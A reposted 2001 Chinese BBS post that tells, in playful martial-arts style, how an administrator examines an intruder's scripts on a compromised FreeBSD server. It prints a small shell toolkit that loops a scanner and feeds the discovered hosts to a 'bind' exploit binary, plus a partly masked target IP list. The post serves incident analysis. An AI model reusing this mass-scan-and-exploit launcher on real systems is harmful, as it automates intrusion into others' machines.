| 您的位置:首页 > 文档 > 网络安全 > |
文章分类热门文章 |
大战黑客传之军情刺探创建:2005-11-07 00:00:00 作者:Unlinux 来自: http://www.Unlinux.com 发信人: melodies (明天就做窝), 信区: FreeBSD 标 题: 大战黑客纪实-3(转) 发信站: BBS 水木清华站 (Sun Jul 1 21:01:33 2001) 文章出处:北邮BBS 作者 clubk (快乐草包) 看板 FreeBSD 标题 大战黑客记实(3) 时间 Sun Apr 15 00:33:04 2001 ——————————————————————————————————————— (续) 话说我等携了那些怪异官兵的全部资料回到大本营细细审问......首先是那些sh门下的,他们没有什么保密纪律可言, 一下就都招了 供词如下: hack.sh: //当然了, 这个家伙的名字就够吸引人的 #!/bin/sh # hach.sh, by xxxxxx@263.net, xx-xx, xxxx clear tail -f hosts.log | while read TARGET do ./dobind.sh $TARGET done ############## End of hach.sh 原来只是个帮凶, 从hosts.log读出些东西来交给dobind.sh来处理 再看dobind.sh是何方神圣: #!/bin/sh # dobind.sh, by xxxxxx@263.net, xx-xx, xxxx /bind $1 <.hack & exit 1 ############## End of dobind.sh 有一点迷惑, 这个东东好像是对hosts.log来的什么参数作处理 到底是要干什么呢?.....不管它先, 看看另一个: scan.sh: //SCAN???? 你要干什么??我好怕怕!! #!/bin/sh # scan.sh, by xxxxxx@263.net, xx-xx, xxxx while true //够狠的, 也不怕你的兵丁累死 do ADDRESS=`./rundb` sleep 100 killall bind 1>>/dev/null 2>>/dev/null3>>/dev/null ./scan $ADDRESS done ############## End of scan.sh 最后一个是star.sh看来是他们的头儿: #!/bin/sh # star.sh, by xxxxxx@263.net, xx-xx, xxxx # Let's go! rm -rf bindname.log touch bindname.log nohup ./scan.sh >>/dev/null & nohup ./hack.sh >>/dev/null & ############## End of star.sh 好吗, 看起来这可不是一个一般的江湖混混 早已取得系统的最高权限, 并在此安排了几个euid=root的"鼹鼠" 八成是一个黑道高手, 至少从他的这几个手下的水平来看是这样 不过奇怪的事怎么他没有悄悄换掉营中的几个心腹兵丁(ps, ls, etc) 让我们很容易的找到了他的蛛丝马迹, 那些躲在器械房(/dev)的可疑官兵也无所遁形 最后还有一些其他相关文件要看: 比如上面dobind.sh用到的hosts.log: xxx.49.6.182 xxx.49.8.196 xxx.49.9.204 xxx.49.12.20 xxx.4.143.132 xxx.4.145.100 xxx.4.146.124 xxx.4.149.80 xxx.4.158.110 xxx.4.158.160 xxx.4.160.28 ...... (处于安全的考虑, 此处隐去了地址的最高段) 全是江湖上的各个门派的所在(IP地址)....然后, 黑客打发在hack.sh中逐个取出地址打发手下bind.sh对付他们去了 这个hosts.log从哪里来的呢? 从star.sh看来, 只有scan.sh来做这件事了 那么就要看scan.sh调遣的兵丁rundb和scan了。可是这两个都是ELF 派的, 铁齿钢牙, 嘴不好撬啊.... (未完待续)' 转载自:http://www.unlinux.com/doc/security/20051107/8264.html 【评论】 【加入收藏夹】 【大 中 小】 【打印】 【关闭】 ※ 相关链接 无相关信息 |